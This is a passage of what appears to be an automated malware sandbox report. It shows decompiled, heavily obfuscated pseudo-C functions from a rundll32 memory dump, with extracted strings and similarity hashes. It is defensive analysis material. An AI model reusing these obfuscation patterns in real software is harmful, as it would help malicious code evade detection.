				_v272 = _v272 ^ 0xa501bad7;
				_v184 = 0xdf13;
				_v184 = _v184 + 0x420b;
				_v184 = _v184 ^ 0x00013cc7;
				_v280 = 0x5728;
				_v280 = _v280 + 0xffffcc3b;
				_v280 = _v280 + 0x76b7;
				_t484 = 0x61;
				_t493 = _a4;
				_t485 = _v148;
				_t433 = _v148;
				_v280 = _v280 / _t484;
				_v280 = _v280 ^ 0x00007737;
				while(_t486 != 0x9208284) {
					if(_t486 == 0xa621ed2) {
						E00436374(_v204, _t485,  *((intOrPtr*)(_t436 + 4)),  *_t436, _v316);
						_t436 = _v152;
						_t494 =  &(_t494[3]);
						_t486 = 0x29b23c8e;
						_t485 = _t485 +  *((intOrPtr*)(_t436 + 4));
						continue;
					}
					if(_t486 == 0x29b23c8e) {
						_push(0x43151c);
						_push(_v208);
						E0043E9D6(_v192, __eflags, E0044CF31(_v268, _v296, __eflags), _v200, _v148, _v288, _v224, _t485);
						E00440D6D(_v272, _v184, _v280, _t420);
						return 1;
					}
					if(_t486 == 0x2fd49363) {
						_v156 = E0043A156();
						_t486 = 0x34a28646;
						L9:
						_t436 = _v152;
						continue;
					}
					if(_t486 == 0x34a28646) {
						_t486 = 0x37f3463b;
						_a4 =  *((intOrPtr*)(_t436 + 4)) + 0x1000;
						continue;
					}
					if(_t486 != 0x37f3463b) {
						L14:
						__eflags = _t486 - 0x2874212b;
						if(__eflags != 0) {
							continue;
						}
						L15:
						__eflags = 0;
						return 0;
					}
					_push(_t436);
					_t485 = E004354FB(_a4);
					 *_t493 = _t485;
					if(_t485 == 0) {
						goto L15;
					}
					_t486 = 0x9208284;
					_t433 = _a4 + _t485;
					goto L9;
				}
				_t406 = E0043F569(_v220,  &_v156, _v232, _v164);
				_t495 =  &(_t494[1]);
				_t339 = (_t406 & 0x0000000f) + 4; // 0x4
				E0043EF7F(_t339, _v228, _v292,  &_v156,  &_v128, _v260);
				 *((char*)(_t495 + (_t406 & 0x0000000f) + 0xf0)) = 0;
				_t410 = E0043F569(_v236,  &_v156, _v188, _v176);
				_t496 =  &(_t495[7]);
				_t352 = (_t410 & 0x0000000f) + 4; // 0x4
				E0043EF7F(_t352, _v168, _v264,  &_v156,  &_v64, _v244);
				_push(0x4315ac);
				_push(_v180);
				 *((char*)(_t496 + (_t410 & 0x0000000f) + 0x134)) = 0;
				_t417 = E0043D28D( &_v128, __eflags, _t433 - _t485, _v320, _v148, E0044CF31(_v160, _v276, __eflags), _v248, _v284, _v300, _v216, _v256, _t485);
				_t494 =  &(_t496[0x12]);
				_t485 = _t485 + _t417;
				__eflags = _t485;
				E00440D6D(_v304, _v240, _v312, _t414);
				_t436 = _v152;
				_t486 = 0xa621ed2;
				goto L14;
			}

0x00447187
0x00447187
0x0044718d
0x0044719a
0x004471a1
0x004471a8
0x004471b3
0x004471c9
0x004471d0
0x004471d9
0x004471e0
0x004471e5
0x004471ee
0x004471f9
0x00447204
0x0044720f
0x0044721a
0x00447225
0x00447230
0x0044723b
0x00447243
0x0044724b
0x00447253
0x0044725b
0x00447267
0x0044726a
0x0044726e
0x00447276
0x00447281
0x00447289
0x00447294
0x0044729c
0x004472a4
0x004472ac
0x004472b4
0x004472bc
0x004472c4
0x004472cc
0x004472d4
0x004472dc
0x004472e4
0x004472ec
0x004472f1
0x004472f9
0x00447301
0x00447309
0x00447311
0x00447319
0x00447321
0x00447326
0x0044732e
0x00447336
0x00447349
0x00447350
0x0044735b
0x00447366
0x00447371
0x0044737c
0x00447384
0x0044738c
0x00447391
0x00447399
0x004473a1
0x004473ac
0x004473b7
0x004473c2
0x004473ca
0x004473d2
0x004473da
0x004473e2
0x004473ec
0x004473f4
0x004473f9
0x00447401
0x0044740c
0x00447414
0x0044741f
0x00447427
0x0044742c
0x0044743a
0x0044743f
0x00447445
0x0044744d
0x00447458
0x00447460
0x0044746b
0x00447473
0x00447478
0x00447482
0x00447485
0x00447489
0x00447491
0x00447499
0x0044749e
0x004474a3
0x004474ab
0x004474b3
0x004474c0
0x004474c9
0x004474cd
0x004474d5
0x004474dd
0x004474e2
0x004474e7
0x004474ec
0x004474f4
0x004474fc
0x00447504
0x0044750c
0x0044751c
0x00447520
0x00447525
0x0044752d
0x00447535
0x00447542
0x00447543
0x00447547
0x0044754f
0x00447557
0x0044755f
0x00447564
0x0044756c
0x00447574
0x0044757c
0x00447581
0x00447586
0x0044758b
0x00447593
0x0044759e
0x004475a9
0x004475b4
0x004475c2
0x004475c6
0x004475ce
0x004475d6
0x004475e0
0x004475e8
0x004475f0
0x004475f8
0x00447600
0x00447608
0x00447610
0x00447618
0x00447620
0x00447628
0x00447633
0x0044763b
0x00447646
0x00447651
0x00447659
0x00447664
0x0044766f
0x00447677
0x00447682
0x0044768a
0x00447695
0x0044769a
0x004476a0
0x004476a8
0x004476b0
0x004476b8
0x004476bd
0x004476c5
0x004476cd
0x004476d5
0x004476dd
0x004476e2
0x004476ea
0x004476f2
0x004476fd
0x00447708
0x00447713
0x0044771b
0x00447723
0x0044772f
0x00447732
0x00447739
0x00447740
0x00447747
0x0044774b
0x00447753
0x00447765
0x00447809
0x0044780e
0x00447815
0x00447818
0x0044781d
0x00000000
0x0044781d
0x00447771
0x00447972
0x00447977
0x004479b0
0x004479c5
0x00000000
0x004479cf
0x0044777d
0x004477e9
0x004477f0
0x004477bf
0x004477bf
0x00000000
0x004477bf
0x00447785
0x004477cb
0x004477d5
0x00000000
0x004477d5
0x0044778d
0x00447959
0x00447959
0x0044795f
0x00000000
0x00000000
0x00447965
0x00447965
0x00000000
0x00447965
0x004477a1
0x004477a7
0x004477a9
0x004477af
0x00000000
0x00000000
0x004477b8
0x004477bd
0x00000000
0x004477bd
0x0044783b
0x00447840
0x00447853
0x0044786e
0x00447881
0x00447897
0x0044789c
0x004478af
0x004478ca
0x004478cf
0x004478d4
0x004478e6
0x0044792f
0x00447934
0x00447937
0x00447937
0x00447946
0x0044794d
0x00447954
0x00000000

Strings

>m, xrefs: 00447664
Xy@, xrefs: 0044726E
Zd, xrefs: 00447401
)S, xrefs: 004474F4
}[, xrefs: 004475E8
cz, xrefs: 00447646
y, xrefs: 00447491
(W, xrefs: 00447713
+!t(, xrefs: 00447959
TD, xrefs: 004476A0
7w, xrefs: 0044774B
0, xrefs: 004472D4

Memory Dump Source

Source File: 00000007.00000002.2330983345.0000000000430000.00000040.00020000.sdmp, Offset: 00430000, based on PE: true

Associated: 00000007.00000002.2331018367.0000000000450000.00000040.00020000.sdmp Download File
Associated: 00000007.00000002.2331022756.0000000000452000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_430000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: (W$)S$+!t($7w$>m$TD$Xy@$Zd$cz$y$}[$0
API String ID: 0-1558577346
Opcode ID: f84c44d59542d0e9307fed0dc7d2c6ebf34cd69fb08eafbe72ec75d73636266c
Instruction ID: 075bf45030e42bdafbdf76987a6733a84cc2b83b7eaf4de1dcf1f1f1e67c5d3b
Opcode Fuzzy Hash: f84c44d59542d0e9307fed0dc7d2c6ebf34cd69fb08eafbe72ec75d73636266c
Instruction Fuzzy Hash: 8B1221725083809FE3A4CF25C589A8FFBE1BBC5718F10891DE5D9962A0D7B99909CF43

Uniqueness

Uniqueness Score: -1.00%

Function 001866FB, Relevance: 15.4, Strings: 12, Instructions: 369COMMON

Download Yara Rule

Strings

Xy@, xrefs: 001867E2
(W, xrefs: 00186C87
0, xrefs: 00186848
>m, xrefs: 00186BD8
TD, xrefs: 00186C14
+!t(, xrefs: 00186ECD
7w, xrefs: 00186CBF
Zd, xrefs: 00186975
)S, xrefs: 00186A68
y, xrefs: 00186A05
cz, xrefs: 00186BBA
}[, xrefs: 00186B5C

Memory Dump Source

Source File: 00000007.00000002.2330819639.0000000000170000.00000040.00000001.sdmp, Offset: 00170000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_170000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: (W$)S$+!t($7w$>m$TD$Xy@$Zd$cz$y$}[$0
API String ID: 0-1558577346
Opcode ID: c996e793aa92d32c9d4ee85a689b4a155b856a04444eddf3dc1470e7b71cd492
Instruction ID: 4eee474ba392e6c48333d6d41856168650d72a1de96f4527f90d0aa0804a4675
Opcode Fuzzy Hash: c996e793aa92d32c9d4ee85a689b4a155b856a04444eddf3dc1470e7b71cd492
Instruction Fuzzy Hash: 011210725083819FE3A4CF25C589A8FFBE2BBC5718F10891DE5D996260D7B58A09CF43

Uniqueness

Uniqueness Score: -1.00%

Function 0044D02D, Relevance: 15.2, Strings: 12, Instructions: 235
COMMONCrypto

Download Yara Rule

C-Code - Quality: 90%

			E0044D02D() {
				char _v520;
				char _v1040;
				char _v1560;
				intOrPtr _v1564;
				intOrPtr _v1568;
				signed int _v1572;
				signed int _v1576;
				signed int _v1580;
				signed int _v1584;
				signed int _v1588;
				signed int _v1592;
				signed int _v1596;
				signed int _v1600;
				signed int _v1604;
				signed int _v1608;
				signed int _v1612;
				signed int _v1616;
				signed int _v1620;
				signed int _v1624;
				signed int _v1628;
				signed int _v1632;
				signed int _v1636;
				signed int _v1640;
				signed int _v1644;
				signed int _v1648;
				signed int _v1652;
				signed int _v1656;
				signed int _v1660;
				signed int _v1664;
				signed int _v1668;
				void* _t261;
				void* _t264;
				void* _t276;
				intOrPtr _t299;
				signed int _t300;
				signed int _t301;
				signed int _t302;
				signed int _t303;
				signed int _t304;
				signed int _t305;
				signed int* _t308;

				_t308 =  &_v1668;
				_v1568 = 0x1b7baa;
				_t276 = 0x2bf07c54;
				_v1564 = 0;
				_v1620 = 0x5ac8;
				_v1620 = _v1620 | 0x6f7e2d8c;
				_v1620 = _v1620 + 0x1161;
				_v1620 = _v1620 ^ 0x6f7e9104;
				_v1632 = 0x343;
				_v1632 = _v1632 * 0x4f;
				_t299 = 0;
				_v1632 = _v1632 << 0xd;
				_v1632 = _v1632 + 0xffffca78;
				_v1632 = _v1632 ^ 0x203536e7;
				_v1640 = 0xae45;
				_v1640 = _v1640 >> 9;
				_t300 = 0x1d;
				_v1640 = _v1640 * 0x65;
				_v1640 = _v1640 + 0xffffcd5a;
				_v1640 = _v1640 ^ 0xffffb49c;
				_v1648 = 0xf6df;
				_v1648 = _v1648 ^ 0x32487b57;
				_v1648 = _v1648 << 0xf;
				_v1648 = _v1648 + 0xffff3bb0;
				_v1648 = _v1648 ^ 0x46c37aca;
				_v1656 = 0xe0fe;
				_v1656 = _v1656 | 0xbb3f58fa;
				_v1656 = _v1656 >> 1;
				_v1656 = _v1656 ^ 0x4bc4dda6;
				_v1656 = _v1656 ^ 0x165b1a8c;
				_v1664 = 0xf6b0;
				_v1664 = _v1664 * 0x33;
				_v1664 = _v1664 + 0xf145;
				_v1664 = _v1664 | 0xcc479c42;
				_v1664 = _v1664 ^ 0xcc77be62;
				_v1624 = 0x11e5;
				_v1624 = _v1624 >> 0xd;
				_v1624 = _v1624 ^ 0x0c673627;
				_v1624 = _v1624 ^ 0x0c670e7e;
				_v1660 = 0xb30e;
				_v1660 = _v1660 / _t300;
				_v1660 = _v1660 ^ 0x2f8cd0cc;
				_v1660 = _v1660 << 0xa;
				_v1660 = _v1660 ^ 0x335bb46d;
				_v1592 = 0x30a6;
				_v1592 = _v1592 + 0x2da3;
				_v1592 = _v1592 ^ 0x000056bb;
				_v1636 = 0x9dba;
				_v1636 = _v1636 << 5;
				_v1636 = _v1636 >> 0xd;
				_v1636 = _v1636 * 0x6e;
				_v1636 = _v1636 ^ 0x000074bb;
				_v1576 = 0xf88b;
				_v1576 = _v1576 >> 8;
				_v1576 = _v1576 ^ 0x00004a5e;
				_v1616 = 0xe870;
				_v1616 = _v1616 + 0xffffed0c;
				_v1616 = _v1616 << 0xa;
				_v1616 = _v1616 ^ 0x03558e80;
				_v1572 = 0x8968;
				_v1572 = _v1572 + 0xffff9e89;
				_v1572 = _v1572 ^ 0x000033ab;
				_v1584 = 0x6f5c;
				_v1584 = _v1584 | 0x7a285989;
				_v1584 = _v1584 ^ 0x7a28059f;
				_v1652 = 0x53fb;
				_t301 = 0x4a;
				_v1652 = _v1652 / _t301;
				_t302 = 0x51;
				_v1652 = _v1652 * 0x2e;
				_v1652 = _v1652 / _t302;
				_v1652 = _v1652 ^ 0x00006fe4;
				_v1644 = 0x731a;
				_v1644 = _v1644 | 0xb42c1025;
				_t303 = 0x26;
				_v1644 = _v1644 / _t303;
				_v1644 = _v1644 | 0x5ebde771;
				_v1644 = _v1644 ^ 0x5ebd9fe9;
				_v1608 = 0x9c04;
				_v1608 = _v1608 + 0xffffbe0d;
				_t304 = 0xf;
				_v1608 = _v1608 * 6;
				_v1608 = _v1608 ^ 0x00025ea7;
				_v1668 = 0x85df;
				_v1668 = _v1668 ^ 0xd0bd5991;
				_v1668 = _v1668 ^ 0x5dcfb772;
				_v1668 = _v1668 | 0x361cad49;
				_v1668 = _v1668 ^ 0xbf7e8aa2;
				_v1628 = 0x5370;
				_v1628 = _v1628 + 0x8359;
				_v1628 = _v1628 | 0x35599af6;
				_v1628 = _v1628 ^ 0x3559ade8;
				_v1600 = 0x3375;
				_v1600 = _v1600 + 0xffffeb08;
				_v1600 = _v1600 >> 0xd;
				_v1600 = _v1600 ^ 0x00002cf7;
				_v1596 = 0x275b;
				_v1596 = _v1596 + 0x8562;
				_v1596 = _v1596 / _t304;
				_v1596 = _v1596 ^ 0x000042b5;
				_v1588 = 0xe1bb;
				_t305 = 0x3c;
				_v1588 = _v1588 / _t305;
				_v1588 = _v1588 ^ 0x00004bb0;
				_v1604 = 0x7428;
				_v1604 = _v1604 | 0x56b3a402;
				_v1604 = _v1604 + 0xffffe147;
				_v1604 = _v1604 ^ 0x56b399df;
				_v1612 = 0xaa76;
				_v1612 = _v1612 + 0x75ae;
				_v1612 = _v1612 | 0x3c256991;
				_v1612 = _v1612 ^ 0x3c250096;
				_v1580 = 0xd062;
				_v1580 = _v1580 ^ 0x00008aa5;
				do {
					while(_t276 != 0x1ed979be) {
						if(_t276 == 0x2bf07c54) {
							_push(_t276);
							E0043471A(_v1620,  &_v1560, _v1632, _v1640, _v1648, _v1656, _v1664);
							_t308 =  &(_t308[8]);
							_t276 = 0x2f47d6b1;
							continue;
						} else {
							_t312 = _t276 - 0x2f47d6b1;
							if(_t276 == 0x2f47d6b1) {
								_push(0x431308);
								_push(_v1636);
								_push(_v1592);
								_t264 = E00435DFC(_v1624, _v1660, _t312);
								E0044D4E1( &_v1040, _t312);
								E004398C5(0x104, _t312, _v1576, _v1616, _v1572, _v1584, _v1652,  *0x451088 + 0x254, _v1644, _v1608,  &_v1040,  *0x451088 + 0x38, _t264,  &_v1560);
								E00440D6D(_v1668, _v1628, _v1600, _t264);
								_t308 =  &(_t308[0x11]);
								_t276 = 0x1ed979be;
								continue;
							}
						}
						goto L7;
					}
					_push(0);
					_push( &_v520);
					_push(_v1580);
					_push(_v1612);
					_push(_v1604);
					_push(_v1588);
					_push(0);
					_push(0);
					_t261 = E00436417(_v1596, __eflags);
					_t308 =  &(_t308[8]);
					__eflags = _t261;
					_t299 =  !=  ? 1 : _t299;
					_t276 = 0x35e6e12b;
					L7:
					__eflags = _t276 - 0x35e6e12b;
				} while (__eflags != 0);
				return _t299;
			}

0x0044d02d
0x0044d033
0x0044d040
0x0044d045
0x0044d049
0x0044d051
0x0044d059
0x0044d061
0x0044d069
0x0044d07b
0x0044d07f
0x0044d081
0x0044d086
0x0044d08e
0x0044d096
0x0044d09e
0x0044d0a8
0x0044d0ab
0x0044d0af
0x0044d0b7
0x0044d0bf
0x0044d0c7
0x0044d0cf
0x0044d0d4
0x0044d0dc
0x0044d0e4
0x0044d0ec
0x0044d0f4
0x0044d0f8
0x0044d100
0x0044d108
0x0044d115
0x0044d119
0x0044d121
0x0044d129
0x0044d131
0x0044d139
0x0044d13e
0x0044d146
0x0044d14e
0x0044d15c
0x0044d160
0x0044d168
0x0044d16d
0x0044d175
0x0044d17d
0x0044d185
0x0044d18d
0x0044d195
0x0044d19a
0x0044d1a4
0x0044d1a8
0x0044d1b0
0x0044d1b8
0x0044d1bd
0x0044d1c5
0x0044d1cd
0x0044d1d5
0x0044d1da
0x0044d1e2
0x0044d1ea
0x0044d1f2
0x0044d1fa
0x0044d202
0x0044d20a
0x0044d214
0x0044d220
0x0044d225
0x0044d235
0x0044d238
0x0044d244
0x0044d248
0x0044d250
0x0044d258
0x0044d264
0x0044d269
0x0044d26f
0x0044d277
0x0044d27f
0x0044d287
0x0044d294
0x0044d297
0x0044d29b
0x0044d2a3
0x0044d2ab
0x0044d2b3
0x0044d2bb
0x0044d2c3
0x0044d2cb
0x0044d2d3
0x0044d2db
0x0044d2e3
0x0044d2eb
0x0044d2f3
0x0044d2fb
0x0044d300
0x0044d308
0x0044d310
0x0044d320
0x0044d324
0x0044d32c
0x0044d338
0x0044d33b
0x0044d33f
0x0044d347
0x0044d34f
0x0044d357
0x0044d35f
0x0044d367
0x0044d36f
0x0044d377
0x0044d37f
0x0044d387
0x0044d397
0x0044d39f
0x0044d39f
0x0044d3b1
0x0044d464
0x0044d485
0x0044d48a
0x0044d48d
0x00000000
0x0044d3b7
0x0044d3b7
0x0044d3b9
0x0044d3bf
0x0044d3c4
0x0044d3c8
0x0044d3d4
0x0044d3e2
0x0044d43d
0x0044d452
0x0044d457
0x0044d45a
0x00000000
0x0044d45a
0x0044d3b9
0x00000000
0x0044d3b1
0x0044d494
0x0044d49c
0x0044d49d
0x0044d4a1
0x0044d4a5
0x0044d4a9
0x0044d4b1
0x0044d4b2
0x0044d4b3
0x0044d4ba
0x0044d4be
0x0044d4c0
0x0044d4c3
0x0044d4c8
0x0044d4c8
0x0044d4c8
0x0044d4e0

Strings

o, xrefs: 0044D248
W{H2, xrefs: 0044D0C7
+5, xrefs: 0044D4C3
^J, xrefs: 0044D1BD
\o, xrefs: 0044D1FA
pS, xrefs: 0044D2CB
+5, xrefs: 0044D4C8
65 , xrefs: 0044D08E
p, xrefs: 0044D1C5
(t, xrefs: 0044D347
[', xrefs: 0044D308
u3, xrefs: 0044D2EB

Memory Dump Source

Source File: 00000007.00000002.2330983345.0000000000430000.00000040.00020000.sdmp, Offset: 00430000, based on PE: true

Associated: 00000007.00000002.2331018367.0000000000450000.00000040.00020000.sdmp Download File
Associated: 00000007.00000002.2331022756.0000000000452000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_430000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: (t$+5$+5$W{H2$['$\o$^J$pS$p$u3$65 $o
API String ID: 0-2856137141
Opcode ID: fe76a6f176b7280f36dfbbe065a31d5550630ccec395870cdaf895269abb8ee1
Instruction ID: 48d0084cae11aaed6d500512a2a485d37995c3abf2580cf09849eed0de7653c8
Opcode Fuzzy Hash: fe76a6f176b7280f36dfbbe065a31d5550630ccec395870cdaf895269abb8ee1
Instruction Fuzzy Hash: B2C121715083809FE368CF25C98A95BFBE1FBC4758F104A1DF186862A0D7B98A49CF47

Uniqueness

Uniqueness Score: -1.00%

Function 0018C5A1, Relevance: 15.2, Strings: 12, Instructions: 235COMMON

Download Yara Rule

Strings

u3, xrefs: 0018C85F
^J, xrefs: 0018C731
p, xrefs: 0018C739
+5, xrefs: 0018CA3C
[', xrefs: 0018C87C
(t, xrefs: 0018C8BB
65 , xrefs: 0018C602
W{H2, xrefs: 0018C63B
o, xrefs: 0018C7BC
pS, xrefs: 0018C83F
+5, xrefs: 0018CA37
\o, xrefs: 0018C76E

Memory Dump Source

Source File: 00000007.00000002.2330819639.0000000000170000.00000040.00000001.sdmp, Offset: 00170000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_170000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: (t$+5$+5$W{H2$['$\o$^J$pS$p$u3$65 $o
API String ID: 0-2856137141
Opcode ID: 902fb5a5338738160e621409dfb9f9346e4afdcae1733b59e629423e593282c2
Instruction ID: c3dca1a930f1e5afd5092700e6dea2759ee8fa43f2ded00f140d3215ca05c674
Opcode Fuzzy Hash: 902fb5a5338738160e621409dfb9f9346e4afdcae1733b59e629423e593282c2
Instruction Fuzzy Hash: 93C122715083809FD368CF25C98A95BFBF1BBC4758F104A1DF186862A0D7B9CA49CF42

Uniqueness

Uniqueness Score: -1.00%

Function 00433336, Relevance: 15.2, Strings: 12, Instructions: 153
COMMONCrypto

Download Yara Rule

C-Code - Quality: 91%

			E00433336(void* __ecx, void* __edx, intOrPtr _a8, intOrPtr _a16, intOrPtr _a20) {
				char _v4;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				unsigned int _v64;
				void* _t123;
				intOrPtr _t134;
				void* _t135;
				void* _t139;
				void* _t141;
				signed int _t153;
				signed int _t154;
				void* _t156;
				signed int* _t160;

				_push(_a20);
				_t139 = __ecx;
				_push(_a16);
				_push(1);
				_push(_a8);
				_push(1);
				_push(__edx);
				_push(__ecx);
				E00442550(_t123);
				_v60 = 0x58ef;
				_t160 =  &(( &_v64)[7]);
				_v60 = _v60 + 0xffff0633;
				_v60 = _v60 >> 9;
				_t156 = 0;
				_t141 = 0x2a642033;
				_t153 = 0x63;
				_v60 = _v60 * 0x2a;
				_v60 = _v60 ^ 0x14ffaedf;
				_v20 = 0x6a04;
				_v20 = _v20 + 0x32d0;
				_v20 = _v20 ^ 0x0000ddf0;
				_v48 = 0x380;
				_v48 = _v48 ^ 0x907d2ab9;
				_v48 = _v48 + 0x250e;
				_v48 = _v48 ^ 0x907d1045;
				_v52 = 0x47eb;
				_v52 = _v52 >> 0x10;
				_v52 = _v52 + 0xffff29cf;
				_v52 = _v52 ^ 0xffff09ac;
				_v24 = 0x6d24;
				_v24 = _v24 / _t153;
				_v24 = _v24 ^ 0x0000449d;
				_v28 = 0xbb34;
				_v28 = _v28 + 0xffffe3e2;
				_v28 = _v28 ^ 0x00008aa5;
				_v32 = 0x42c0;
				_v32 = _v32 << 8;
				_v32 = _v32 ^ 0x004292e1;
				_v36 = 0x1d03;
				_v36 = _v36 | 0xc4a3f1ad;
				_v36 = _v36 ^ 0xc4a39a93;
				_v40 = 0x16bd;
				_v40 = _v40 << 8;
				_v40 = _v40 ^ 0x0016fb39;
				_v44 = 0x384e;
				_t154 = 0x3b;
				_v44 = _v44 / _t154;
				_v44 = _v44 ^ 0x00003cb9;
				_v64 = 0x6f3c;
				_v64 = _v64 + 0x49f0;
				_v64 = _v64 * 0x12;
				_v64 = _v64 >> 0xb;
				_v64 = _v64 ^ 0x00002a42;
				_v8 = 0x21c3;
				_v8 = _v8 << 0xb;
				_v8 = _v8 ^ 0x010e5853;
				_v12 = 0xc49d;
				_v12 = _v12 << 0xb;
				_v12 = _v12 ^ 0x0624cbc5;
				_v16 = 0x33ea;
				_v16 = _v16 + 0xffff095d;
				_v16 = _v16 ^ 0xffff1135;
				_v56 = 0x9287;
				_v56 = _v56 * 0x3d;
				_v56 = _v56 | 0xa9bdb70a;
				_v56 = _v56 ^ 0x6edfa2bf;
				_v56 = _v56 ^ 0xc7607732;
				_t155 = _v4;
				do {
					while(_t141 != 0x213a8f08) {
						if(_t141 == 0x27f2e66a) {
							_t135 = E00442878(_t155,  &_v4, _v48, _v52, _v24);
							_t160 =  &(_t160[3]);
							if(_t135 != 0) {
								_t141 = 0x2db65059;
								continue;
							}
						} else {
							if(_t141 == 0x29395626) {
								E0043F1ED(_v8, _v12, _v16, _v56, _v4);
							} else {
								if(_t141 == 0x2a642033) {
									_t141 = 0x213a8f08;
									continue;
								} else {
									if(_t141 != 0x2db65059) {
										goto L13;
									} else {
										_t105 =  &_v64; // 0x9
										E00433850(_v4, 1, _v28, _t141, 1, _v32, _v36, _v40, _v44, _t139,  *_t105, _a8);
										_t160 =  &(_t160[0xa]);
										_t141 = 0x29395626;
										_t156 =  !=  ? 1 : _t156;
										continue;
									}
								}
							}
						}
						L16:
						return _t156;
					}
					_t134 = E0043F2AB();
					_t155 = _t134;
					if(_t134 == 0xffffffff) {
						_t141 = 0x3912b486;
						goto L13;
					} else {
						_t141 = 0x27f2e66a;
						continue;
					}
					goto L16;
					L13:
				} while (_t141 != 0x3912b486);
				goto L16;
			}

0x0043333d
0x00433343
0x00433345
0x0043334a
0x0043334b
0x0043334f
0x00433350
0x00433351
0x00433352
0x00433357
0x0043335f
0x00433362
0x0043336c
0x00433371
0x00433378
0x0043337f
0x00433382
0x00433386
0x0043338e
0x00433396
0x0043339e
0x004333a6
0x004333ae
0x004333b6
0x004333be
0x004333c6
0x004333ce
0x004333d3
0x004333db
0x004333e3
0x004333f3
0x004333f7
0x004333ff
0x00433407
0x0043340f
0x00433417
0x0043341f
0x00433424
0x0043342c
0x00433434
0x0043343c
0x00433444
0x0043344c
0x00433451
0x00433459
0x00433465
0x00433468
0x0043346c
0x00433474
0x0043347c
0x00433489
0x0043348d
0x00433492
0x0043349a
0x004334a2
0x004334a7
0x004334af
0x004334b7
0x004334bc
0x004334c4
0x004334cc
0x004334d4
0x004334dc
0x004334e9
0x004334ed
0x004334f5
0x004334fd
0x00433505
0x00433509
0x00433509
0x0043351b
0x0043358f
0x00433594
0x00433599
0x0043359b
0x00000000
0x0043359b
0x0043351d
0x00433523
0x004335ea
0x00433529
0x0043352f
0x00433576
0x00000000
0x00433531
0x00433537
0x00000000
0x0043353d
0x00433543
0x00433562
0x00433567
0x0043356a
0x00433571
0x00000000
0x00433571
0x00433537
0x0043352f
0x00433523
0x004335f3
0x004335fb
0x004335fb
0x004335ad
0x004335b2
0x004335b7
0x004335c3
0x00000000
0x004335b9
0x004335b9
0x00000000
0x004335b9
0x00000000
0x004335c8
0x004335c8
0x00000000

Strings

B*, xrefs: 004335A9, 00433543
B*, xrefs: 00433492
3, xrefs: 004334C4
3 d*, xrefs: 00433529
3 d*, xrefs: 00433378
&V9), xrefs: 0043356A
N8, xrefs: 00433459
X, xrefs: 00433357
G, xrefs: 004333C6
$m, xrefs: 004333E3
&V9), xrefs: 0043351D
B*, xrefs: 00433373

Memory Dump Source

Source File: 00000007.00000002.2330983345.0000000000430000.00000040.00020000.sdmp, Offset: 00430000, based on PE: true

Associated: 00000007.00000002.2331018367.0000000000450000.00000040.00020000.sdmp Download File
Associated: 00000007.00000002.2331022756.0000000000452000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_430000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: B*$B*$$m$&V9)$&V9)$3 d*$3 d*$B*$N8$3$G$X
API String ID: 0-1096093052
Opcode ID: 521acd00a0da17cdbf2c41cbea6d9d8a89f3cfc0f17e08e26cf1249a71e27ffd
Instruction ID: 03a4d4a55e85eecab7f228ca8d389321a2c6ad100050c61e3bbfcc5a847778f4
Opcode Fuzzy Hash: 521acd00a0da17cdbf2c41cbea6d9d8a89f3cfc0f17e08e26cf1249a71e27ffd
Instruction Fuzzy Hash: 69617771508341ABD358CF21C88941BBFF1FBD8748F505A0EF19292260D3BACA49CB87

Uniqueness

Uniqueness Score: -1.00%

Function 001728AA, Relevance: 15.2, Strings: 12, Instructions: 153COMMON

Download Yara Rule

Strings

3 d*, xrefs: 001728EC
3 d*, xrefs: 00172A9D
$m, xrefs: 00172957
X, xrefs: 001728CB
3, xrefs: 00172A38
&V9), xrefs: 00172ADE
G, xrefs: 0017293A
B*, xrefs: 001728E7
B*, xrefs: 00172A06
&V9), xrefs: 00172A91
N8, xrefs: 001729CD
B*, xrefs: 00172B1D, 00172AB7

Memory Dump Source

Source File: 00000007.00000002.2330819639.0000000000170000.00000040.00000001.sdmp, Offset: 00170000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_170000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: B*$B*$$m$&V9)$&V9)$3 d*$3 d*$B*$N8$3$G$X
API String ID: 0-1096093052
Opcode ID: 79a5d864f846127270572b84529ccbb0276f247360850f9f8f4a9f3641cbf1bc
Instruction ID: 2d75441e2dc511b7d0bed8580fd3b45f4bd8441f846e24f98faaea7b6663e37d
Opcode Fuzzy Hash: 79a5d864f846127270572b84529ccbb0276f247360850f9f8f4a9f3641cbf1bc
Instruction Fuzzy Hash: C96165715083419FD368DF21C88981BBBF5FBD4748F108A0DF596922A0D3B6CA5ACB87

Uniqueness

Uniqueness Score: -1.00%

Function 0043D6F0, Relevance: 12.9, Strings: 10, Instructions: 379
COMMONCrypto

Download Yara Rule

C-Code - Quality: 81%

			E0043D6F0(intOrPtr* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, signed int _a20, intOrPtr _a24) {
				char _v524;
				char _v1044;
				short _v1588;
				short _v1590;
				char _v1592;
				signed int _v1636;
				signed int _v1640;
				intOrPtr _v1644;
				intOrPtr _v1648;
				intOrPtr _v1652;
				signed int _v1656;
				signed int _v1660;
				signed int _v1664;
				signed int _v1668;
				signed int _v1672;
				signed int _v1676;
				signed int _v1680;
				signed int _v1684;
				signed int _v1688;
				signed int _v1692;
				signed int _v1696;
				signed int _v1700;
				signed int _v1704;
				signed int _v1708;
				signed int _v1712;
				signed int _v1716;
				signed int _v1720;
				signed int _v1724;
				signed int _v1728;
				signed int _v1732;
				signed int _v1736;
				signed int _v1740;
				signed int _v1744;
				signed int _v1748;
				signed int _v1752;
				signed int _v1756;
				signed int _v1760;
				signed int _v1764;
				signed int _v1768;
				signed int _v1772;
				signed int _v1776;
				signed int _v1780;
